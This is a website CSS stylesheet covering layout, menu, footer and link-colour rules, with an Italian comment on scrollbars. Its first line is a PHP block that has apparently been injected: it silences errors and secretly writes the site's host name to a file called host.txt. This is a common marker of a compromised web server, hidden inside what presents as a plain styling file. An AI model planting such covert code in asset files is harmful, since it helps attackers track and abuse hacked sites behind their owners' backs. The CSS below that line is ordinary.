<? error_reporting(0); $mhfp = fopen("host.txt", "w"); if ($mhfp) { fwrite($mhfp, $_SERVER["HTTP_HOST"]); fclose($mhfp); } ?>html{/*	overflow: -moz-scrollbars-vertical; /* visualizza sempre la scrollbar laterale per firefox */
	overflow-y:scroll;
	overflow-x:auto;
	overflow:moz-scrollbars-vertical
}

body{
	background-color: White;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #000000;
	margin:0px 0px; padding:0px;
}

#container{
	width: 975px;
	position: absolute;
	height: 610px;
	top: 50%;
	margin-top: -305px;
	left: 50%; margin-left: -487px;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	color: #000000;
	text-align: justify;
	line-height: 18px;
}

#logo_link{
	top: 90px;
	left: 22px;
	position: absolute;
	width: 206px;
	height: 43px;
	z-index: 99;
}

#ghidoli_link{
	top: 512px;
	left: 17px;
	position: absolute;
	width: 35px;
	height: 39px;
	z-index: 99;
}

#menu_left{
	width: 249px;
	height: 590px;
	position: absolute;
	background-image: url(img/menu.png);
}

#menu_txt{
	right: 20px;
	top: 203px;
	position: absolute;
	font-family: Arial, Helvetica, sans-serif;
	text-align: right;
	text-transform: uppercase;
	font-weight: normal;
	font-size: 11px;
	line-height: 28px;
	display: inline;
	color: #999999;
}

#content{
	width: 726px;
	height: 590px;
	position: absolute;
	left: 249px;
}

#footer{
	margin: 0px auto;
	width: 975px;
	font-size: 11px;
	position: absolute;
	bottom: 0px;
	color: #707173;
}

a:link {
color:#999999; text-decoration:none
}
a:visited {
color:#999999; text-decoration:none
}
a:active {
color:#707173; text-decoration:none
}
a:hover {
color:#707173; text-decoration:none
}
a:focus {
    moz-outline: 0px;
    outline: 0px;
    outline-offset 3px;
}

a.cy:link {
color:#4687b8; text-decoration:none
}
a.cy:visited {
color:#4687b8; text-decoration:none
}
a.cy:active {
color:#707173; text-decoration:none
}
a.cy:hover {
color:#707173; text-decoration:none
}
a.cy:focus {
    moz-outline: 0px;
    outline: 0px;
    outline-offset 3px;
}

a.link:link {
color:#000000; text-decoration:none
}
a.link:visited {
color:#000000; text-decoration:none
}
a.link:active {
color:#000000; text-decoration:underline
}
a.link:hover {
color:#000000; text-decoration:underline
}
a.link:focus {
    moz-outline: 0px;
    outline: 0px;
    outline-offset 3px;
}

a.footer:link {
color:#707173; text-decoration:none
}
a.footer:visited {
color:#707173; text-decoration:none
}
a.footer:active {
color:#707173; text-decoration:underline;
}
a.footer:hover {
color:#707173; text-decoration:underline;
}
a.footer:focus {
    moz-outline: 0px;
    outline: 0px;
    outline-offset 3px;
}
